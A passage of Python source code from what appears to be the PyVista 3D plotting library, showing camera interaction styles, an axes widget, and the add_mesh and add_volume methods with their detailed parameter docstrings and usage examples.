of the mouse movement determines the acceleration of the camera, so the
camera continues to move even if the mouse is not moving.
For a 3-button mouse, the left button is for rotation, the right button
for zooming, the middle button for panning, and ctrl + left button for
spinning. (With fewer mouse buttons, ctrl + shift + left button is
for zooming, and shift + left button is for panning.)
"""
self._style = vtk.vtkInteractorStyleJoystickCamera()
return self.update_style()
def enable_zoom_style(self):
"""Set the interactive style to rubber band zoom.
This interactor style allows the user to draw a rectangle in the render
window using the left mouse button. When the mouse button is released,
the current camera zooms by an amount determined from the shorter side
of the drawn rectangle.
"""
self._style = vtk.vtkInteractorStyleRubberBandZoom()
return self.update_style()
def enable_terrain_style(self):
"""Set the interactive style to terrain.
Used to manipulate a camera which is viewing a scene with a natural
view up, e.g., terrain. The camera in such a scene is manipulated by
specifying azimuth (angle around the view up vector) and elevation
(the angle from the horizon).
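Examples
--------
A short sketch of switching the interactor style on an existing plotter
(the effect is only visible in an interactive window):
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> plotter.enable_terrain_style()
>>> plotter.show()  # doctest:+SKIP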
"""
self._style = vtk.vtkInteractorStyleTerrain()
return self.update_style()
def enable_rubber_band_style(self):
"""Set the interactive style to rubber band picking.
This interactor style allows the user to draw a rectangle in the render
window by hitting 'r' and then using the left mouse button.
When the mouse button is released, the attached picker operates on the
pixel in the center of the selection rectangle. If the picker happens to
be a vtkAreaPicker it will operate on the entire selection rectangle.
When the 'p' key is hit the above pick operation occurs on a 1x1
rectangle. In other respects it behaves the same as its parent class.
"""
self._style = vtk.vtkInteractorStyleRubberBandPick()
return self.update_style()
def set_focus(self, point):
"""Set focus to a point."""
self.renderer.set_focus(point)
self._render()
def set_position(self, point, reset=False):
"""Set camera position to a point."""
self.renderer.set_position(point, reset=reset)
self._render()
def set_viewup(self, vector):
"""Set camera viewup vector."""
self.renderer.set_viewup(vector)
self._render()
def _render(self):
"""Redraw the render window if it exists."""
if hasattr(self, 'ren_win'):
if hasattr(self, 'render_trigger'):
self.render_trigger.emit()
elif not self._first_time:
self.render()
def add_axes(self, interactive=None, line_width=2,
color=None, x_color=None, y_color=None, z_color=None,
xlabel='X', ylabel='Y', zlabel='Z', labels_off=False,
box=None, box_args=None):
"""Add an interactive axes widget."""
if interactive is None:
interactive = rcParams['interactive']
if hasattr(self, 'axes_widget'):
self.axes_widget.SetInteractive(interactive)
update_axes_label_color(color)
return
if box is None:
box = rcParams['axes']['box']
if box:
if box_args is None:
box_args = {}
self.axes_actor = create_axes_orientation_box(
label_color=color, line_width=line_width,
x_color=x_color, y_color=y_color, z_color=z_color,
xlabel=xlabel, ylabel=ylabel, zlabel=zlabel,
labels_off=labels_off, **box_args)
else:
self.axes_actor = create_axes_marker(
label_color=color, line_width=line_width,
x_color=x_color, y_color=y_color, z_color=z_color,
xlabel=xlabel, ylabel=ylabel, zlabel=zlabel, labels_off=labels_off)
self.axes_widget = vtk.vtkOrientationMarkerWidget()
self.axes_widget.SetOrientationMarker(self.axes_actor)
if hasattr(self, 'iren'):
self.axes_widget.SetInteractor(self.iren)
self.axes_widget.SetEnabled(1)
self.axes_widget.SetInteractive(interactive)
return
def hide_axes(self):
"""Hide the axes orientation widget."""
if hasattr(self, 'axes_widget'):
self.axes_widget.EnabledOff()
def show_axes(self):
"""Show the axes orientation widget."""
if hasattr(self, 'axes_widget'):
self.axes_widget.EnabledOn()
else:
self.add_axes()
def isometric_view_interactive(self):
"""Set the current interactive render window to isometric view."""
interactor = self.iren.GetInteractorStyle()
renderer = interactor.GetCurrentRenderer()
if renderer is None:
renderer = self.renderer
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""Update window, redraw, process messages query.
Parameters
----------
stime : int, optional
Duration of timer that interrupt vtkRenderWindowInteractor in
milliseconds.
force_redraw : bool, optional
Call vtkRenderWindowInteractor.Render() immediately.
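Examples
--------
A rough sketch of a manual refresh loop (assumes the window was shown
with ``auto_close=False`` so it stays open between updates):
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> plotter.show(auto_close=False)  # doctest:+SKIP
>>> for _ in range(10):  # doctest:+SKIP
...     plotter.update(stime=50, force_redraw=True)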
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if not hasattr(self, 'iren'):
return
update_rate = self.iren.GetDesiredUpdateRate()
if (curr_time - Plotter.last_update_time) > (1.0/update_rate):
self.right_timer_id = self.iren.CreateRepeatingTimer(stime)
self.iren.Start()
self.iren.DestroyTimer(self.right_timer_id)
self._render()
Plotter.last_update_time = curr_time
else:
if force_redraw:
self.iren.Render()
def add_mesh(self, mesh, color=None, style=None, scalars=None,
clim=None, show_edges=None, edge_color=None,
point_size=5.0, line_width=None, opacity=1.0,
flip_scalars=False, lighting=None, n_colors=256,
interpolate_before_map=True, cmap=None, label=None,
reset_camera=None, scalar_bar_args=None, show_scalar_bar=None,
stitle=None, multi_colors=False, name=None, texture=None,
render_points_as_spheres=None, render_lines_as_tubes=False,
smooth_shading=False, ambient=0.0, diffuse=1.0, specular=0.0,
specular_power=100.0, nan_color=None, nan_opacity=1.0,
loc=None, culling=None, rgb=False, categories=False,
use_transparency=False, below_color=None, above_color=None,
annotations=None, pickable=True, preference="point",
log_scale=False, **kwargs):
"""Add any PyVista/VTK mesh or dataset that PyVista can wrap to the scene.
This method uses a mesh representation to view the surfaces
and/or geometry of datasets. For volume rendering, see
:func:`pyvista.BasePlotter.add_volume`.
Parameters
----------
mesh : pyvista.Common or pyvista.MultiBlock
Any PyVista or VTK mesh is supported. Also, any dataset
that :func:`pyvista.wrap` can handle including NumPy arrays of XYZ
points.
color : string or 3 item list, optional, defaults to white
Use to make the entire mesh have a single solid color.
Either a string, RGB list, or hex color string. For example:
``color='white'``, ``color='w'``, ``color=[1, 1, 1]``, or
``color='#FFFFFF'``. Color will be overridden if scalars are
specified.
style : string, optional
Visualization style of the mesh. One of the following:
``style='surface'``, ``style='wireframe'``, ``style='points'``.
Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a
wireframe of the outer geometry.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active scalars are
used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
edge_color : string or 3 item list, optional, defaults to black
The solid color to give the edges when ``show_edges=True``.
Either a string, RGB list, or hex color string.
point_size : float, optional
Point size of any nodes in the dataset plotted. Also applicable
when style='points'. Default ``5.0``
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
opacity : float, str, array-like
Opacity of the mesh. If a single float value is given, it will be
the global opacity of the mesh and uniformly applied everywhere -
should be between 0 and 1. A string can also be specified to map
the scalars range to a predefined opacity transfer function
(options include: 'linear', 'linear_r', 'geom', 'geom_r').
A string could also be used to map a scalars array from the mesh to
the opacity (must have same number of elements as the
``scalars`` argument). Or you can pass a custom made transfer
function that is an array either ``n_colors`` in length or shorter.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
lighting : bool, optional
Enable or disable view direction lighting. Default False.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalars display. Default is True.
When False, OpenGL will interpolate the mapped colors which can
result in showing colors that are not present in the color map.
cmap : str, list, optional
Name of the Matplotlib colormap to use when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
You can also specify a list of colors to override an
existing colormap with a custom one. For example, to
create a three color colormap you might specify
``['green', 'red', 'blue']``
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of
the scalars array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
texture : vtk.vtkTexture or np.ndarray or boolean, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
datasets. If set to ``True``, the first available texture
on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
render_points_as_spheres : bool, optional
Render points as spheres rather than flat squares.
render_lines_as_tubes : bool, optional
Render lines as thick tubes rather than one-pixel lines.
smooth_shading : bool, optional
Enable smooth (Phong) shading instead of flat shading.
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0
specular : float, optional
The specular lighting coefficient. Default 0.0
specular_power : float, optional
The specular power. Between 0.0 and 128.0. Default 100.0
nan_color : string or 3 item list, optional, defaults to gray
The color to use for all ``NaN`` values in the plotted scalar
array.
nan_opacity : float, optional
Opacity of ``NaN`` values. Should be between 0 and 1.
Default 1.0
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults to ``False``.
rgb : bool, optional
If a 2-dimensional array is passed as the scalars, plot those
values as RGB(A) colors. ``rgba`` is also an accepted alias for this.
Opacity (the A) is optional.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
use_transparency : bool, optional
Invert the opacity mappings and make the values correspond to
transparency.
below_color : string or 3 item list, optional
Solid color for values below the scalars range (``clim``). This
will automatically set the scalar bar ``below_label`` to
``'Below'``
above_color : string or 3 item list, optional
Solid color for values above the scalars range (``clim``). This
will automatically set the scalar bar ``above_label`` to
``'Above'``
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalars range to annotate on the scalar bar and the values are
the string annotations.
pickable : bool
Set whether this mesh is pickable
Return
------
actor: vtk.vtkActor
VTK actor of the mesh.
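Examples
--------
A minimal sketch coloring a sphere by its z coordinate (the array name
``'height'`` is arbitrary, and ``cmap='viridis'`` assumes Matplotlib is
installed):
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['height'] = sphere.points[:, 2]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere, scalars='height', cmap='viridis', show_edges=True)
>>> plotter.show()  # doctest:+SKIP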
"""
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not is_pyvista_dataset(mesh):
raise TypeError('Object type ({}) not supported for plotting in PyVista.'.format(type(mesh)))
##### Parse arguments to be used for all meshes #####
if scalar_bar_args is None:
scalar_bar_args = {}
if show_edges is None:
show_edges = rcParams['show_edges']
if edge_color is None:
edge_color = rcParams['edge_color']
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if lighting is None:
lighting = rcParams['lighting']
# supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if render_points_as_spheres is None:
render_points_as_spheres = rcParams['render_points_as_spheres']
if name is None:
name = '{}({})'.format(type(mesh).__name__, str(hex(id(mesh))))
if nan_color is None:
nan_color = rcParams['nan_color']
nan_color = list(parse_color(nan_color))
nan_color.append(nan_opacity)
if color is True:
color = rcParams['color']
if texture is False:
texture = None
if culling is True:
culling = 'backface'
rgb = kwargs.pop('rgba', rgb)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
##### Handle composite datasets #####
if isinstance(mesh, pyvista.MultiBlock):
# first check the scalars
if clim is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalars specified
if isinstance(scalars, str):
clim = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise RuntimeError('scalars array must be given as a string name for multiblock datasets.')
the_arguments = locals()
the_arguments.pop('self')
the_arguments.pop('mesh')
the_arguments.pop('kwargs')
if multi_colors:
# Compute unique colors for each index of the block
if has_matplotlib:
from itertools import cycle
cycler = matplotlib.rcParams['axes.prop_cycle']
colors = cycle(cycler)
else:
multi_colors = False
logging.warning('Please install matplotlib for color cycles')
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
if not is_pyvista_dataset(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
if not is_pyvista_dataset(mesh[idx]):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1):
# Note that a block can exist but be None type
# or it could have zeros points (be empty) after filtering
continue
# Now check that scalars is available for this dataset
if isinstance(data, vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
## Add to the scene
the_arguments['color'] = color
the_arguments['scalars'] = ts
the_arguments['name'] = next_name
the_arguments['texture'] = None
a = self.add_mesh(data, **the_arguments)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
##### Plot a single PyVista mesh #####
# Compute surface normals if using smooth shading
if smooth_shading:
# extract surface if mesh is exterior
if not isinstance(mesh, pyvista.PolyData):
grid = mesh
mesh = grid.extract_surface()
ind = mesh.point_arrays['vtkOriginalPointIds']
# remap scalars
if isinstance(scalars, np.ndarray):
scalars = scalars[ind]
mesh.compute_normals(cell_normals=False, inplace=True)
if mesh.n_points < 1:
raise RuntimeError('Empty meshes cannot be plotted. Input mesh has zero points.')
# set main values
self.mesh = mesh
self.mapper = make_mapper(vtk.vtkDataSetMapper)
self.mapper.SetInputData(self.mesh)
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
actor, prop = self.add_actor(self.mapper,
reset_camera=reset_camera,
name=name, loc=loc, culling=culling)
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalars components are not vectors/tuples
scalars = mesh.active_scalars_name
# Don't allow plotting of string arrays by default
if scalars is not None:# and np.issubdtype(mesh.active_scalars.dtype, np.number):
if stitle is None:
stitle = scalars
else:
scalars = None
# set main values
self.mesh = mesh
self.mapper = make_mapper(vtk.vtkDataSetMapper)
self.mapper.SetInputData(self.mesh)
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
actor, prop = self.add_actor(self.mapper,
reset_camera=reset_camera,
name=name, loc=loc, culling=culling,
pickable=pickable)
# Make sure scalars is a numpy array after this point
original_scalar_name = None
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
original_scalar_name = scalars
scalars = get_array(mesh, scalars,
preference=preference, err=True)
if stitle is None:
stitle = original_scalar_name
if texture is True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (vtk.vtkTexture, vtk.vtkOpenGLTexture)):
raise TypeError('Invalid texture type ({})'.format(type(texture)))
if mesh.GetPointData().GetTCoords() is None:
raise AssertionError('Input mesh does not have texture coordinates to support the texture.')
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# Handle making opacity array =========================================
_custom_opac = False
if isinstance(opacity, str):
try:
# Get array from mesh
opacity = get_array(mesh, opacity,
preference=preference, err=True)
opacity = normalize(opacity)
_custom_opac = True
except:
# Or get opacity transfer function
opacity = opacity_transfer_function(opacity, n_colors)
else:
if scalars.shape[0] != opacity.shape[0]:
raise RuntimeError('Opacity array and scalars array must have the same number of elements.')
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
if scalars.shape[0] == opacity.shape[0]:
# User could pass an array of opacities for every point/cell
pass
else:
opacity = opacity_transfer_function(opacity, n_colors)
if use_transparency and np.max(opacity) <= 1.0:
opacity = 1 - opacity
elif use_transparency and isinstance(opacity, np.ndarray):
opacity = 255 - opacity
# Scalars formatting ==================================================
if cmap is None: # Set default map if matplotlib is available
if has_matplotlib:
cmap = rcParams['cmap']
# Set the array title for when it is added back to the mesh
if _custom_opac:
title = '__custom_rgba'
elif stitle is None:
title = 'Data'
else:
title = stitle
if scalars is not None:
# if scalars is a string, then get the first array found with that name
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
_using_labels = False
if not np.issubdtype(scalars.dtype, np.number):
# raise TypeError('Non-numeric scalars are currently not supported for plotting.')
# TODO: If str array, digitize and annotate
cats, scalars = np.unique(scalars.astype('|S'), return_inverse=True)
values = np.unique(scalars)
clim = [np.min(values) - 0.5, np.max(values) + 0.5]
title = '{}-digitized'.format(title)
n_colors = len(cats)
scalar_bar_args.setdefault('n_labels', 0)
_using_labels = True
if rgb:
if scalars.ndim != 2 or scalars.shape[1] < 3 or scalars.shape[1] > 4:
raise ValueError('RGB array must be n_points/n_cells by 3/4 in shape.')
if scalars.ndim != 1:
if rgb:
pass
elif scalars.ndim == 2 and (scalars.shape[0] == mesh.n_points or scalars.shape[0] == mesh.n_cells):
scalars = np.linalg.norm(scalars.copy(), axis=1)
title = '{}-normed'.format(title)
else:
scalars = scalars.ravel()
if scalars.dtype == np.bool:
scalars = scalars.astype(np.float)
def prepare_mapper(scalars):
# Scalars interpolation approach
if scalars.shape[0] == mesh.n_points:
self.mesh._add_point_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == mesh.n_cells:
self.mesh._add_cell_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, mesh)
# Common tasks
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
if rgb or _custom_opac:
self.mapper.SetColorModeToDirectScalars()
else:
self.mapper.SetColorModeToMapScalars()
return
prepare_mapper(scalars)
table = self.mapper.GetLookupTable()
if log_scale:
table.SetScaleToLog10()
if _using_labels:
table.SetAnnotations(convert_array(values), convert_string_array(cats))
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if np.any(clim) and not rgb:
self.mapper.scalar_range = clim[0], clim[1]
table.SetNanColor(nan_color)
if above_color:
table.SetUseAboveRangeColor(True)
table.SetAboveRangeColor(*parse_color(above_color, opacity=1))
scalar_bar_args.setdefault('above_label', 'Above')
if below_color:
table.SetUseBelowRangeColor(True)
table.SetBelowRangeColor(*parse_color(below_color, opacity=1))
scalar_bar_args.setdefault('below_label', 'Below')
if cmap is not None:
if not has_matplotlib:
cmap = None
logging.warning('Please install matplotlib for color maps.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
ctable = cmap(np.linspace(0, 1, n_colors))*255
ctable = ctable.astype(np.uint8)
# Set opactities
if isinstance(opacity, np.ndarray) and not _custom_opac:
ctable[:,-1] = opacity
if flip_scalars:
ctable = np.ascontiguousarray(ctable[::-1])
table.SetTable(VN.numpy_to_vtk(ctable))
if _custom_opac:
hue = normalize(scalars, minimum=clim[0], maximum=clim[1])
scalars = cmap(hue)[:, :3]
# combine colors and alpha into a Nx4 matrix
scalars = np.concatenate((scalars, opacity[:, None]), axis=1)
scalars = (scalars * 255).astype(np.uint8)
prepare_mapper(scalars)
else: # no cmap specified
if flip_scalars:
table.SetHueRange(0.0, 0.66667)
else:
table.SetHueRange(0.66667, 0.0)
else:
self.mapper.SetScalarModeToUseFieldData()
# Set actor properties ================================================
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = rcParams['outline_color']
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise Exception('Invalid style. Must be one of the following:\n'
'\t"surface"\n'
'\t"wireframe"\n'
'\t"points"\n')
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
if smooth_shading:
prop.SetInterpolationToPhong()
else:
prop.SetInterpolationToFlat()
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = parse_color(color)
prop.SetColor(rgb_color)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(parse_color(edge_color))
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
geom = pyvista.single_triangle()
if scalars is not None:
geom = pyvista.Box()
rgb_color = parse_color('black')
self._labels.append([geom, label, rgb_color])
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
# Add scalar bar if available
if stitle is not None and show_scalar_bar and (not rgb or _custom_opac):
self.add_scalar_bar(stitle, **scalar_bar_args)
return actor
def add_volume(self, volume, scalars=None, clim=None, resolution=None,
opacity='linear', n_colors=256, cmap=None, flip_scalars=False,
reset_camera=None, name=None, ambient=0.0, categories=False,
loc=None, culling=False, multi_colors=False,
blending='composite', mapper=None,
stitle=None, scalar_bar_args=None, show_scalar_bar=None,
annotations=None, pickable=True, preference="point",
opacity_unit_distance=None, shade=False,
diffuse=0.7, specular=0.2, specular_power=10.0, **kwargs):
"""Add a volume, rendered using a smart mapper by default.
Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`.
Parameters
----------
volume : 3D numpy.ndarray or pyvista.UniformGrid
The input volume to visualize. 3D numpy arrays are accepted.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active scalars are
used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
opacity : string or numpy.ndarray, optional
Opacity mapping for the scalars array.
A string can also be specified to map the scalars range to a
predefined opacity transfer function (options include: 'linear',
'linear_r', 'geom', 'geom_r'). Or you can pass a custom made
transfer function that is an array either ``n_colors`` in length or
shorter.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
cmap : str, optional
Name of the Matplotlib colormap to use when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults to ``False``.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
multi_colors : bool, optional
Whether or not to use multiple colors when plotting MultiBlock
object. Blocks will be colored sequentially as 'Reds', 'Greens',
'Blues', and 'Grays'.
blending : str, optional
Blending mode for visualisation of the input object(s). Can be
one of 'additive', 'maximum', 'minimum', 'composite', or
'average'. Defaults to 'composite'.
mapper : str, optional
Volume mapper to use given by name. Options include:
``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and ``'smart'``.
If ``None`` the ``"volume_mapper"`` in the ``rcParams`` is used.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of
the scalars array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalars range to annotate on the scalar bar and the values are
the string annotations.
opacity_unit_distance : float
Set/Get the unit distance on which the scalar opacity transfer
function is defined. Meaning that over that distance, a given
opacity (from the transfer function) is accumulated. This is
adjusted for the actual sampling distance during rendering. By
default, this is the length of the diagonal of the bounding box of
the volume divided by the dimensions.
shade : bool
Default off. If shading is turned on, the mapper may perform
shading calculations - in some cases shading does not apply
(for example, in a maximum intensity projection) and therefore
shading will not be performed even if this flag is on.
diffuse : float, optional
The diffuse lighting coefficient. Default 0.7
specular : float, optional
The specular lighting coefficient. Default 0.2
specular_power : float, optional
The specular power. Between 0.0 and 128.0. Default 10.0
Return
------
actor: vtk.vtkVolume
VTK volume of the input data.
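Examples
--------
A rough sketch rendering a random 3D array (the shape and opacity mapping
are chosen arbitrarily for illustration; ``cmap='viridis'`` assumes
Matplotlib is installed):
>>> import numpy as np
>>> import pyvista
>>> data = np.random.random((30, 30, 30))
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_volume(data, opacity='linear', cmap='viridis')
>>> plotter.show()  # doctest:+SKIP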
"""
# Handle default arguments
if name is None:
name = '{}({})'.format(type(volume).__name__, str(hex(id(volume))))
# Supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_volume`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
if scalar_bar_args is None:
scalar_bar_args = {}
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if culling is True:
culling = 'backface'
if mapper is None:
mapper = rcParams["volume_mapper"]
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(volume):
if isinstance(volume, np.ndarray):
volume = wrap(volume)
if resolution is None:
resolution = [1,1,1]
elif len(resolution) != 3:
raise ValueError('Invalid resolution dimensions.')
volume.spacing = resolution
else:
volume = wrap(volume)
if not is_pyvista_dataset(volume):
raise TypeError('Object type ({}) not supported for plotting in PyVista.'.format(type(volume)))
else:
# HACK: Make a copy so the original object is not altered
volume = volume.copy()
if isinstance(volume, pyvista.MultiBlock):
from itertools import cycle
cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples'])
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(volume.GetNumberOfBlocks()):
if volume[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
block = wrap(volume.GetBlock(idx))
if resolution is None:
try:
block_resolution = block.GetSpacing()
except AttributeError:
block_resolution = resolution
else:
block_resolution = resolution
if multi_colors:
color = next(cycler)
else:
color = cmap
a = self.add_volume(block, resolution=block_resolution, opacity=opacity,
n_colors=n_colors, cmap=color, flip_scalars=flip_scalars,
reset_camera=reset_camera, name=next_name,
ambient=ambient, categories=categories, loc=loc,
culling=culling, clim=clim,
mapper=mapper, pickable=pickable,
opacity_unit_distance=opacity_unit_distance,
shade=shade, diffuse=diffuse, specular=specular,
specular_power=specular_power)
actors.append(a)
return actors
if not isinstance(volume, pyvista.UniformGrid):
raise TypeError('Type ({}) not supported for volume rendering at this time. Use `pyvista.UniformGrid`.'.format(type(volume)))
if opacity_unit_distance is None:
opacity_unit_distance = volume.length / (np.mean(volume.dimensions) - 1)
if scalars is None:
# Make sure scalars components are not vectors/tuples
scalars = volume.active_scalars
# Don't allow plotting of string arrays by default
if scalars is not None and np.issubdtype(scalars.dtype, np.number):
if stitle is None:
stitle = volume.active_scalars_info[1]
else:
raise RuntimeError('No scalars to use for volume rendering.')
elif isinstance(scalars, str):
pass
##############
title = 'Data' if stitle is None else stitle
if isinstance(scalars, str):
title = scalars
scalars = get_array(volume, scalars,
preference=preference, err=True)
if stitle is None:
stitle = title
if not isinstance(scalars, np.ndarray):
